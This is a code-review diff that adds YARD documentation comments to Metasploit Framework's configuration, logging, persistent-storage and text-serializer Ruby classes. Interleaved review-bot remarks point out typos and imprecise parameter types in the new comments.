config_directory + FileSep + self['ConfigFile']
|
config_directory + FileSep + self['ConfigFile']
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the full path to the history file.
|
||||||
#
|
#
|
||||||
# Returns the full path to the configuration file.
|
# @return [String] path the history file.
|
||||||
#
|
|
||||||
def history_file
|
def history_file
|
||||||
config_directory + FileSep + "history"
|
config_directory + FileSep + "history"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the global module directory.
|
# Returns the global module directory.
|
||||||
#
|
#
|
||||||
|
# @return [String] path to global module directory.
|
||||||
def module_directory
|
def module_directory
|
||||||
install_root + FileSep + self['ModuleDirectory']
|
install_root + FileSep + self['ModuleDirectory']
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the path that scripts can be loaded from.
|
# Returns the path that scripts can be loaded from.
|
||||||
#
|
#
|
||||||
|
# @return [String] path to script directory.
|
||||||
def script_directory
|
def script_directory
|
||||||
install_root + FileSep + self['ScriptDirectory']
|
install_root + FileSep + self['ScriptDirectory']
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the directory that log files should be stored in.
|
# Returns the directory that log files should be stored in.
|
||||||
#
|
#
|
||||||
|
# @return [String] path to log directory.
|
||||||
def log_directory
|
def log_directory
|
||||||
config_directory + FileSep + self['LogDirectory']
|
config_directory + FileSep + self['LogDirectory']
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the directory that plugins are stored in.
|
# Returns the directory that plugins are stored in.
|
||||||
#
|
#
|
||||||
|
# @return [String] path to plugin directory.
|
||||||
def plugin_directory
|
def plugin_directory
|
||||||
install_root + FileSep + self['PluginDirectory']
|
install_root + FileSep + self['PluginDirectory']
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the directory in which session log files are to reside.
|
# Returns the directory in which session log files are to reside.
|
||||||
#
|
#
|
||||||
|
# @return [String] path to session log directory.
|
||||||
def session_log_directory
|
def session_log_directory
|
||||||
config_directory + FileSep + self['SessionLogDirectory']
|
config_directory + FileSep + self['SessionLogDirectory']
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the directory in which captured data will reside.
|
# Returns the directory in which captured data will reside.
|
||||||
#
|
#
|
||||||
|
# @return [String] path to loot directory.
|
||||||
def loot_directory
|
def loot_directory
|
||||||
config_directory + FileSep + self['LootDirectory']
|
config_directory + FileSep + self['LootDirectory']
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the directory in which locally-generated data will reside.
|
# Returns the directory in which locally-generated data will reside.
|
||||||
#
|
#
|
||||||
|
# @return [String] path to locally-generated data directory.
|
||||||
def local_directory
|
def local_directory
|
||||||
config_directory + FileSep + self['LocalDirectory']
|
config_directory + FileSep + self['LocalDirectory']
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the user-specific module base path
|
# Returns the user-specific module base path
|
||||||
#
|
#
|
||||||
|
# @return [String] path to user-specific modules directory.
|
||||||
def user_module_directory
|
def user_module_directory
|
||||||
config_directory + FileSep + "modules"
|
config_directory + FileSep + "modules"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the user-specific plugin base path
|
# Returns the user-specific plugin base path
|
||||||
#
|
#
|
||||||
|
# @return [String] path to user-specific plugin directory.
|
||||||
def user_plugin_directory
|
def user_plugin_directory
|
||||||
config_directory + FileSep + "plugins"
|
config_directory + FileSep + "plugins"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the user-specific script base path
|
# Returns the user-specific script base path
|
||||||
#
|
#
|
||||||
|
# @return [String] path to user-specific script directory.
|
||||||
def user_script_directory
|
def user_script_directory
|
||||||
config_directory + FileSep + "scripts"
|
config_directory + FileSep + "scripts"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the data directory
|
# Returns the data directory
|
||||||
#
|
#
|
||||||
|
# @return [String] path to data directory.
|
||||||
def data_directory
|
def data_directory
|
||||||
install_root + FileSep + self['DataDirectory']
|
install_root + FileSep + self['DataDirectory']
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Initializes configuration, creating directories as necessary.
|
# Initializes configuration, creating directories as necessary.
|
||||||
#
|
#
|
||||||
|
# @return [void]
|
||||||
def init
|
def init
|
||||||
FileUtils.mkdir_p(module_directory)
|
FileUtils.mkdir_p(module_directory)
|
||||||
FileUtils.mkdir_p(config_directory)
|
FileUtils.mkdir_p(config_directory)
|
||||||
|
@ -320,27 +331,31 @@ class Config < Hash
|
||||||
FileUtils.mkdir_p(user_plugin_directory)
|
FileUtils.mkdir_p(user_plugin_directory)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Loads configuration from the supplied file path, or the default one if
|
# Loads configuration from the supplied file path, or the default one if
|
||||||
# none is specified.
|
# none is specified.
|
||||||
#
|
#
|
||||||
|
# @param path [String] the path to the configuration file.
|
||||||
|
# @return [Rex::Parser::Ini] INI file parser.
|
||||||
def load(path = nil)
|
def load(path = nil)
|
||||||
path = config_file if (!path)
|
path = config_file if (!path)
|
||||||
|
|
||||||
return Rex::Parser::Ini.new(path)
|
return Rex::Parser::Ini.new(path)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Saves configuration to the path specified in the ConfigFile hash key or
|
# Saves configuration to the path specified in the ConfigFile hash key or
|
||||||
# the default path is one isn't specified. The options should be group
|
# the default path if one isn't specified. The options should be group
|
||||||
# references that have named value pairs. Example:
|
# references that have named value pairs.
|
||||||
#
|
#
|
||||||
|
# @param opts [Hash] Hash containing configuration options.
|
||||||
|
# @option opts 'ConfigFile' [Hash] configuration file these options apply
|
||||||
|
# to.
|
||||||
|
# @return [void]
|
||||||
|
# @example Save 'Cat' => 'Foo' in group 'ExampleGroup'
|
||||||
# save(
|
# save(
|
||||||
# 'ExampleGroup' =>
|
# 'ExampleGroup' =>
|
||||||
# {
|
# {
|
||||||
# 'Foo' => 'Cat'
|
# 'Foo' => 'Cat'
|
||||||
# })
|
# })
|
||||||
#
|
|
||||||
def save(opts)
|
def save(opts)
|
||||||
ini = Rex::Parser::Ini.new(opts['ConfigFile'] || config_file)
|
ini = Rex::Parser::Ini.new(opts['ConfigFile'] || config_file)
|
||||||
|
|
||||||
|
|
|
@ -4,19 +4,19 @@ require 'msf/base'
|
||||||
|
|
||||||
module Msf
|
module Msf
|
||||||
|
|
||||||
###
|
|
||||||
#
|
|
||||||
# This module provides an initialization interface for logging.
|
# This module provides an initialization interface for logging.
|
||||||
#
|
|
||||||
###
|
|
||||||
class Logging
|
class Logging
|
||||||
|
|
||||||
|
#Is logging initialized
|
||||||
|
#@private
|
||||||
@@initialized = false
|
@@initialized = false
|
||||||
|
#Is session logging enabled
|
||||||
|
#@private
|
||||||
@@session_logging = false
|
@@session_logging = false
|
||||||
|
|
||||||
#
|
|
||||||
# Initialize logging.
|
# Initialize logging.
|
||||||
#
|
#
|
||||||
|
# @return [void]
|
||||||
def self.init
|
def self.init
|
||||||
if (! @@initialized)
|
if (! @@initialized)
|
||||||
@@initialized = true
|
@@initialized = true
|
||||||
|
@ -35,9 +35,13 @@ class Logging
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Enables a log source of name src. Creates the .log file in the
|
||||||
|
# configured directory if logging is not already enabled for this
|
||||||
|
# source.
|
||||||
#
|
#
|
||||||
# Enables a log source.
|
# @param src [String] log source name.
|
||||||
#
|
# @param level [Integer] logging level.
|
||||||
|
# @return [void]
|
||||||
def self.enable_log_source(src, level = 0)
|
def self.enable_log_source(src, level = 0)
|
||||||
if (log_source_registered?(src) == false)
|
if (log_source_registered?(src) == false)
|
||||||
f = Rex::Logging::Sinks::Flatfile.new(
|
f = Rex::Logging::Sinks::Flatfile.new(
|
||||||
|
@ -47,30 +51,33 @@ class Logging
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Stops logging for a given log source.
|
# Stops logging for a given log source.
|
||||||
#
|
#
|
||||||
|
# @param src [String] the log source to disable.
|
||||||
|
# @return [Boolean] true if successful. false if not.
|
||||||
def self.disable_log_source(src)
|
def self.disable_log_source(src)
|
||||||
deregister_log_source(src)
|
deregister_log_source(src)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Sets whether or not session logging is to be enabled.
|
# Sets whether or not session logging is to be enabled.
|
||||||
#
|
#
|
||||||
|
# @param tf [Boolean] true if enabling. false if disabling.
|
||||||
|
# @return [void]
|
||||||
def self.enable_session_logging(tf)
|
def self.enable_session_logging(tf)
|
||||||
@@session_logging = tf
|
@@session_logging = tf
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns whether or not session logging is enabled.
|
# Returns whether or not session logging is enabled.
|
||||||
#
|
#
|
||||||
|
# @return [Boolean] true if enabled. false if disabled.
|
||||||
def self.session_logging_enabled?
|
def self.session_logging_enabled?
|
||||||
@@session_logging || false
|
@@session_logging || false
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Starts logging for a given session.
|
# Starts logging for a given session.
|
||||||
#
|
#
|
||||||
|
# @param session [Msf::Session] the session to start logging on.
|
||||||
|
# @return [void]
|
||||||
def self.start_session_log(session)
|
def self.start_session_log(session)
|
||||||
if (log_source_registered?(session.log_source) == false)
|
if (log_source_registered?(session.log_source) == false)
|
||||||
f = Rex::Logging::Sinks::Flatfile.new(
|
f = Rex::Logging::Sinks::Flatfile.new(
|
||||||
|
@ -82,9 +89,10 @@ class Logging
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Stops logging for a given session.
|
# Stops logging for a given session.
|
||||||
#
|
#
|
||||||
|
# @param session [Msf::Session] the session to stop logging.
|
||||||
|
# @return [Boolean] true if sucessful. false if not.
|
||||||
def self.stop_session_log(session)
|
def self.stop_session_log(session)
|
||||||
rlog("\n[*] Logging stopped: #{Time.now}\n\n", session.log_source)
|
rlog("\n[*] Logging stopped: #{Time.now}\n\n", session.log_source)
|
||||||
|
|
||||||
|
|
|
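Review bot: The new `@return` tag on `stop_session_log` in the last hunk misspells "successful": `# @return [Boolean] true if sucessful. false if not.` should read `# @return [Boolean] true if successful. false if not.`, and its `@param session` line reads better as `the session to stop logging for.`. Whether the method actually returns a Boolean is not visible here, since its body continues past the hunk; the same applies to the `@return [Boolean]` on `disable_log_source`, which simply returns whatever `deregister_log_source` returns. In the first hunk of this file the new comments above the class variables, `#Is logging initialized` and `#@private`, drop the space after `#` that every other comment in the file uses; `# @private` is also the form YARD documents for that tag.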
@ -1,24 +1,25 @@
|
||||||
# -*- coding: binary -*-
|
# -*- coding: binary -*-
|
||||||
module Msf
|
module Msf
|
||||||
|
|
||||||
###
|
|
||||||
#
|
|
||||||
# This class provides a generalized interface to persisting information,
|
# This class provides a generalized interface to persisting information,
|
||||||
# either in whole or in part, about the state of the framework. This can
|
# either in whole or in part, about the state of the framework. This can
|
||||||
# be used to store data that can later be reinitialized in a new instance
|
# be used to store data that can later be reinitialized in a new instance
|
||||||
# of the framework or to provide a simple mechanism for generating reports
|
# of the framework or to provide a simple mechanism for generating reports
|
||||||
# of some form.
|
# of some form.
|
||||||
#
|
#
|
||||||
###
|
# @abstract Subclass and override {#initialize}, {#store}, and {#fetch}.
|
||||||
class PersistentStorage
|
class PersistentStorage
|
||||||
|
|
||||||
@@storage_classes = {}
|
@@storage_classes = {}
|
||||||
|
|
||||||
#
|
|
||||||
# Creates an instance of the storage class with the supplied name. The
|
# Creates an instance of the storage class with the supplied name. The
|
||||||
# array supplied as an argument is passed to the constructor of the
|
# array supplied as an argument is passed to the constructor of the
|
||||||
# associated class as a means of generic initialization.
|
# associated class as a means of generic initialization.
|
||||||
#
|
#
|
||||||
|
# @param name [String] the name of the storage class.
|
||||||
|
# @param params [Object] the parameters to give the new class.
|
||||||
|
# @return [PersistentStorage] the newly created class.
|
||||||
|
# @return [nil] if class has not been added through {.add_storage_class}.
|
||||||
def self.create(name, *params)
|
def self.create(name, *params)
|
||||||
if (klass = @@storage_classes[name])
|
if (klass = @@storage_classes[name])
|
||||||
klass.new(*params)
|
klass.new(*params)
|
||||||
|
@ -27,36 +28,42 @@ class PersistentStorage
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Stub initialization routine that takes the params passed to create.
|
# Stub initialization routine that takes the params passed to create.
|
||||||
#
|
#
|
||||||
|
# @param params [Object] the parameters to initialize with.
|
||||||
def initialize(*params)
|
def initialize(*params)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# This methods stores all or part of the current state of the supplied
|
# This methods stores all or part of the current state of the supplied
|
||||||
# framework instance to whatever medium the derived class implements.
|
# framework instance to whatever medium the derived class implements.
|
||||||
# If the derived class does not implement this method, the
|
# If the derived class does not implement this method, the
|
||||||
# NotImplementedError is raised.
|
# NotImplementedError is raised.
|
||||||
#
|
#
|
||||||
|
# @param framework [Msf::Framework] framework state to store.
|
||||||
|
# @return [void] no implementation.
|
||||||
|
# @raise [NotImpementedError] raised if not implemented.
|
||||||
def store(framework)
|
def store(framework)
|
||||||
raise NotImplementedError
|
raise NotImplementedError
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# This method initializes the supplied framework instance with the state
|
# This method initializes the supplied framework instance with the state
|
||||||
# that is stored in the persisted backing that the derived class
|
# that is stored in the persisted backing that the derived class
|
||||||
# implements. If the derived class does not implement this method, the
|
# implements. If the derived class does not implement this method, the
|
||||||
# NotImplementedError is raised.
|
# NotImplementedError is raised.
|
||||||
#
|
#
|
||||||
|
# @param framework [Msf::Framework] framework to restore state to.
|
||||||
|
# @return [void] no implementation.
|
||||||
|
# @raise [NotImplementedError] raised if not implemented.
|
||||||
def fetch(framework)
|
def fetch(framework)
|
||||||
raise NotImplementedError
|
raise NotImplementedError
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# This method adds a new storage class to the hash of storage classes that
|
# This method adds a new storage class to the hash of storage classes that
|
||||||
# can be created through create.
|
# can be created through create.
|
||||||
#
|
#
|
||||||
|
# @param name [String] the name of the storage class.
|
||||||
|
# @param klass [PersistentStorage] the storage class to add.
|
||||||
|
# @return [void]
|
||||||
def self.add_storage_class(name, klass)
|
def self.add_storage_class(name, klass)
|
||||||
@@storage_classes[name] = klass
|
@@storage_classes[name] = klass
|
||||||
end
|
end
|
||||||
|
|
|
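Review bot: The `@raise` tag added above `store` misspells the exception class as `NotImpementedError`, so the YARD reference will not resolve and it disagrees with the `@raise [NotImplementedError]` written on `fetch` a few lines below; it should be `# @raise [NotImplementedError] raised if not implemented.`. Both `@param params [Object]` tags (on `self.create` and on `initialize`) describe a splat parameter, which is always an Array of whatever the caller passed — the prose above `create` already says "the array supplied as an argument" — so `[Array]` is the accurate type. The `@return [PersistentStorage] the newly created class.` on `create` is also slightly off: `klass.new(*params)` yields an instance, so `the newly created storage instance.` describes what is returned.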
@ -2,30 +2,29 @@
|
||||||
module Msf
|
module Msf
|
||||||
class PersistentStorage
|
class PersistentStorage
|
||||||
|
|
||||||
###
|
|
||||||
#
|
|
||||||
# This class persists the state of the framework to a flatfile in a human
|
# This class persists the state of the framework to a flatfile in a human
|
||||||
# readable format. At the moment, the level of information it conveys is
|
# readable format. At the moment, the level of information it conveys is
|
||||||
# rather basic and ugly, but this is just a prototype, so it will be improved.
|
# rather basic and ugly, but this is just a prototype, so it will be improved.
|
||||||
# Oh yes, it will be improved.
|
# Oh yes, it will be improved.
|
||||||
#
|
|
||||||
###
|
|
||||||
class Flatfile < PersistentStorage
|
class Flatfile < PersistentStorage
|
||||||
|
|
||||||
#
|
|
||||||
# Initializes the flatfile for storage based on the parameters specified.
|
# Initializes the flatfile for storage based on the parameters specified.
|
||||||
# The hash must contain a FilePath attribute.
|
# The hash must contain a FilePath attribute.
|
||||||
#
|
#
|
||||||
|
# @overload initialize(path)
|
||||||
|
# Initializes the flatfile with the set path.
|
||||||
|
# @param path [String] path of the flatfile.
|
||||||
def initialize(*params)
|
def initialize(*params)
|
||||||
raise ArgumentError, "You must specify a file path" if (params.length == 0)
|
raise ArgumentError, "You must specify a file path" if (params.length == 0)
|
||||||
|
|
||||||
self.path = params[0]
|
self.path = params[0]
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# This method stores the current state of the framework in human readable
|
# This method stores the current state of the framework in human readable
|
||||||
# form to a flatfile. This can be used as a reporting mechanism.
|
# form to a flatfile. This can be used as a reporting mechanism.
|
||||||
#
|
#
|
||||||
|
# @param framework [Msf:::Framework] the Framework to store.
|
||||||
|
# @return [void]
|
||||||
def store(framework)
|
def store(framework)
|
||||||
# Open the supplied file path for writing.
|
# Open the supplied file path for writing.
|
||||||
self.fd = File.new(self.path, "w")
|
self.fd = File.new(self.path, "w")
|
||||||
|
@ -41,10 +40,11 @@ protected
|
||||||
|
|
||||||
attr_accessor :fd, :path # :nodoc:
|
attr_accessor :fd, :path # :nodoc:
|
||||||
|
|
||||||
#
|
|
||||||
# This method stores general information about the current state of the
|
# This method stores general information about the current state of the
|
||||||
# framework instance.
|
# framework instance.
|
||||||
#
|
#
|
||||||
|
# @param framework [Msf::Framework] the Framework to store.
|
||||||
|
# @return [void]
|
||||||
def store_general(framework)
|
def store_general(framework)
|
||||||
fd.print(
|
fd.print(
|
||||||
"\n" +
|
"\n" +
|
||||||
|
|
|
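Review bot: The `@param framework [Msf:::Framework]` tag added above `store` has a stray third colon; it should be `# @param framework [Msf::Framework] the Framework to store.`, matching the tag written on `store_general` in the next hunk. The retained sentence `# The hash must contain a FilePath attribute.` above `initialize` now contradicts the new `@overload initialize(path)` and the code, which reads `params[0]` directly and raises `ArgumentError` only when no argument is given; dropping that sentence, or rewording it to `# The first parameter must be the file path.`, keeps the docstring consistent with the overload. `store`'s body continues outside the hunk.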
@ -2,22 +2,22 @@
|
||||||
module Msf
|
module Msf
|
||||||
module Serializer
|
module Serializer
|
||||||
|
|
||||||
###
|
|
||||||
#
|
|
||||||
# This class formats information in a plain-text format that
|
# This class formats information in a plain-text format that
|
||||||
# is meant to be displayed on a console or some other non-GUI
|
# is meant to be displayed on a console or some other non-GUI
|
||||||
# medium.
|
# medium.
|
||||||
#
|
|
||||||
###
|
|
||||||
class ReadableText
|
class ReadableText
|
||||||
|
|
||||||
|
#Default number of characters to wrap at.
|
||||||
DefaultColumnWrap = 70
|
DefaultColumnWrap = 70
|
||||||
|
#Default number of characters to indent.
|
||||||
DefaultIndent = 2
|
DefaultIndent = 2
|
||||||
|
|
||||||
#
|
|
||||||
# Returns a formatted string that contains information about
|
# Returns a formatted string that contains information about
|
||||||
# the supplied module instance.
|
# the supplied module instance.
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Module] the module to dump information for.
|
||||||
|
# @param indent [String] the indentation to use.
|
||||||
|
# @return [String] formatted text output of the dump.
|
||||||
def self.dump_module(mod, indent = " ")
|
def self.dump_module(mod, indent = " ")
|
||||||
case mod.type
|
case mod.type
|
||||||
when MODULE_PAYLOAD
|
when MODULE_PAYLOAD
|
||||||
|
@ -37,9 +37,14 @@ class ReadableText
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps an exploit's targets.
|
# Dumps an exploit's targets.
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Exploit] the exploit module to dump targets
|
||||||
|
# for.
|
||||||
|
# @param indent [String] the indentation to use (only the length
|
||||||
|
# matters).
|
||||||
|
# @param h [String] the string to display as the table heading.
|
||||||
|
# @return [String] the string form of the table.
|
||||||
def self.dump_exploit_targets(mod, indent = '', h = nil)
|
def self.dump_exploit_targets(mod, indent = '', h = nil)
|
||||||
tbl = Rex::Ui::Text::Table.new(
|
tbl = Rex::Ui::Text::Table.new(
|
||||||
'Indent' => indent.length,
|
'Indent' => indent.length,
|
||||||
|
@ -57,9 +62,13 @@ class ReadableText
|
||||||
tbl.to_s + "\n"
|
tbl.to_s + "\n"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps the exploit's selected target
|
# Dumps the exploit's selected target
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Exploit] the exploit module.
|
||||||
|
# @param indent [String] the indentation to use (only the length
|
||||||
|
# matters)
|
||||||
|
# @param h [String] the string to display as the table heading.
|
||||||
|
# @return [String] the string form of the table.
|
||||||
def self.dump_exploit_target(mod, indent = '', h = nil)
|
def self.dump_exploit_target(mod, indent = '', h = nil)
|
||||||
tbl = Rex::Ui::Text::Table.new(
|
tbl = Rex::Ui::Text::Table.new(
|
||||||
'Indent' => indent.length,
|
'Indent' => indent.length,
|
||||||
|
@ -75,9 +84,13 @@ class ReadableText
|
||||||
tbl.to_s + "\n"
|
tbl.to_s + "\n"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps an auxiliary's actions
|
# Dumps an auxiliary's actions
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Auxiliary] the auxiliary module.
|
||||||
|
# @param indent [String] the indentation to use (only the length
|
||||||
|
# matters)
|
||||||
|
# @param h [String] the string to display as the table heading.
|
||||||
|
# @return [String] the string form of the table.
|
||||||
def self.dump_auxiliary_actions(mod, indent = '', h = nil)
|
def self.dump_auxiliary_actions(mod, indent = '', h = nil)
|
||||||
tbl = Rex::Ui::Text::Table.new(
|
tbl = Rex::Ui::Text::Table.new(
|
||||||
'Indent' => indent.length,
|
'Indent' => indent.length,
|
||||||
|
@ -95,10 +108,14 @@ class ReadableText
|
||||||
tbl.to_s + "\n"
|
tbl.to_s + "\n"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps the table of payloads that are compatible with the supplied
|
# Dumps the table of payloads that are compatible with the supplied
|
||||||
# exploit.
|
# exploit.
|
||||||
#
|
#
|
||||||
|
# @param exploit [Msf::Exploit] the exploit module.
|
||||||
|
# @param indent [String] the indentation to use (only the length
|
||||||
|
# matters)
|
||||||
|
# @param h [String] the string to display as the table heading.
|
||||||
|
# @return [String] the string form of the table.
|
||||||
def self.dump_compatible_payloads(exploit, indent = '', h = nil)
|
def self.dump_compatible_payloads(exploit, indent = '', h = nil)
|
||||||
tbl = Rex::Ui::Text::Table.new(
|
tbl = Rex::Ui::Text::Table.new(
|
||||||
'Indent' => indent.length,
|
'Indent' => indent.length,
|
||||||
|
@ -116,9 +133,11 @@ class ReadableText
|
||||||
tbl.to_s + "\n"
|
tbl.to_s + "\n"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps information about an exploit module.
|
# Dumps information about an exploit module.
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Exploit] the exploit module.
|
||||||
|
# @param indent [String] the indentation to use.
|
||||||
|
# @return [String] the string form of the information.
|
||||||
def self.dump_exploit_module(mod, indent = '')
|
def self.dump_exploit_module(mod, indent = '')
|
||||||
output = "\n"
|
output = "\n"
|
||||||
output << " Name: #{mod.name}\n"
|
output << " Name: #{mod.name}\n"
|
||||||
|
@ -171,9 +190,11 @@ class ReadableText
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps information about an auxiliary module.
|
# Dumps information about an auxiliary module.
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Auxiliary] the auxiliary module.
|
||||||
|
# @param indent [String] the indentation to use.
|
||||||
|
# @return [String] the string form of the information.
|
||||||
def self.dump_auxiliary_module(mod, indent = '')
|
def self.dump_auxiliary_module(mod, indent = '')
|
||||||
output = "\n"
|
output = "\n"
|
||||||
output << " Name: #{mod.name}\n"
|
output << " Name: #{mod.name}\n"
|
||||||
|
@ -207,9 +228,11 @@ class ReadableText
|
||||||
return output
|
return output
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps information about a payload module.
|
# Dumps information about a payload module.
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Payload] the payload module.
|
||||||
|
# @param indent [String] the indentation to use.
|
||||||
|
# @return [String] the string form of the information.
|
||||||
def self.dump_payload_module(mod, indent = '')
|
def self.dump_payload_module(mod, indent = '')
|
||||||
# General
|
# General
|
||||||
output = "\n"
|
output = "\n"
|
||||||
|
@ -244,9 +267,11 @@ class ReadableText
|
||||||
return output
|
return output
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps information about a module, just the basics.
|
# Dumps information about a module, just the basics.
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Module] the module.
|
||||||
|
# @param indent [String] the indentation to use.
|
||||||
|
# @return [String] the string form of the information.
|
||||||
def self.dump_basic_module(mod, indent = '')
|
def self.dump_basic_module(mod, indent = '')
|
||||||
# General
|
# General
|
||||||
output = "\n"
|
output = "\n"
|
||||||
|
@ -277,13 +302,16 @@ class ReadableText
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#No current use
|
||||||
def self.dump_generic_module(mod, indent = '')
|
def self.dump_generic_module(mod, indent = '')
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps the list of options associated with the
|
# Dumps the list of options associated with the
|
||||||
# supplied module.
|
# supplied module.
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Module] the module.
|
||||||
|
# @param indent [String] the indentation to use.
|
||||||
|
# @return [String] the string form of the information.
|
||||||
def self.dump_options(mod, indent = '')
|
def self.dump_options(mod, indent = '')
|
||||||
tbl = Rex::Ui::Text::Table.new(
|
tbl = Rex::Ui::Text::Table.new(
|
||||||
'Indent' => indent.length,
|
'Indent' => indent.length,
|
||||||
|
@ -309,9 +337,11 @@ class ReadableText
|
||||||
return tbl.to_s
|
return tbl.to_s
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps the advanced options associated with the supplied module.
|
# Dumps the advanced options associated with the supplied module.
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Module] the module.
|
||||||
|
# @param indent [String] the indentation to use.
|
||||||
|
# @return [String] the string form of the information.
|
||||||
def self.dump_advanced_options(mod, indent = '')
|
def self.dump_advanced_options(mod, indent = '')
|
||||||
output = ''
|
output = ''
|
||||||
pad = indent
|
pad = indent
|
||||||
|
@ -333,9 +363,11 @@ class ReadableText
|
||||||
return output
|
return output
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps the evasion options associated with the supplied module.
|
# Dumps the evasion options associated with the supplied module.
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Module] the module.
|
||||||
|
# @param indent [String] the indentation to use.
|
||||||
|
# @return [String] the string form of the information.
|
||||||
def self.dump_evasion_options(mod, indent = '')
|
def self.dump_evasion_options(mod, indent = '')
|
||||||
output = ''
|
output = ''
|
||||||
pad = indent
|
pad = indent
|
||||||
|
@ -358,6 +390,11 @@ class ReadableText
|
||||||
return output
|
return output
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Dumps the references associated with the supplied module.
|
||||||
|
#
|
||||||
|
# @param mod [Msf::Module] the module.
|
||||||
|
# @param indent [String] the indentation to use.
|
||||||
|
# @return [String] the string form of the information.
|
||||||
def self.dump_references(mod, indent = '')
|
def self.dump_references(mod, indent = '')
|
||||||
output = ''
|
output = ''
|
||||||
|
|
||||||
|
@ -372,9 +409,13 @@ class ReadableText
|
||||||
output
|
output
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps the contents of a datastore.
|
# Dumps the contents of a datastore.
|
||||||
#
|
#
|
||||||
|
# @param name [String] displayed as the table header.
|
||||||
|
# @param ds [Msf::DataStore] the DataStore to dump.
|
||||||
|
# @param indent [Integer] the indentation size.
|
||||||
|
# @param col [Integer] the column width.
|
||||||
|
# @return [String] the formatted DataStore contents.
|
||||||
def self.dump_datastore(name, ds, indent = DefaultIndent, col = DefaultColumnWrap)
|
def self.dump_datastore(name, ds, indent = DefaultIndent, col = DefaultColumnWrap)
|
||||||
tbl = Rex::Ui::Text::Table.new(
|
tbl = Rex::Ui::Text::Table.new(
|
||||||
'Indent' => indent,
|
'Indent' => indent,
|
||||||
|
@ -392,9 +433,17 @@ class ReadableText
|
||||||
return ds.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No entries in data store.\n"
|
return ds.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No entries in data store.\n"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps the list of active sessions.
|
# Dumps the list of active sessions.
|
||||||
#
|
#
|
||||||
|
# @param framework [Msf::Framework] the framework to dump.
|
||||||
|
# @param opts [Hash] the options to dump with.
|
||||||
|
# @option opts :session_ids [Array] the list of sessions to dump (no
|
||||||
|
# effect).
|
||||||
|
# @option opts :verbose [Boolean] gives more information if set to
|
||||||
|
# true.
|
||||||
|
# @option opts :indent [Integer] set the indentation amount.
|
||||||
|
# @option opts :col [Integer] the column wrap width.
|
||||||
|
# @return [String] the formatted list of sessions.
|
||||||
def self.dump_sessions(framework, opts={})
|
def self.dump_sessions(framework, opts={})
|
||||||
ids = (opts[:session_ids] || framework.sessions.keys).sort
|
ids = (opts[:session_ids] || framework.sessions.keys).sort
|
||||||
verbose = opts[:verbose] || false
|
verbose = opts[:verbose] || false
|
||||||
|
@ -437,12 +486,14 @@ class ReadableText
|
||||||
return framework.sessions.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active sessions.\n"
|
return framework.sessions.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active sessions.\n"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps the list of running jobs.
|
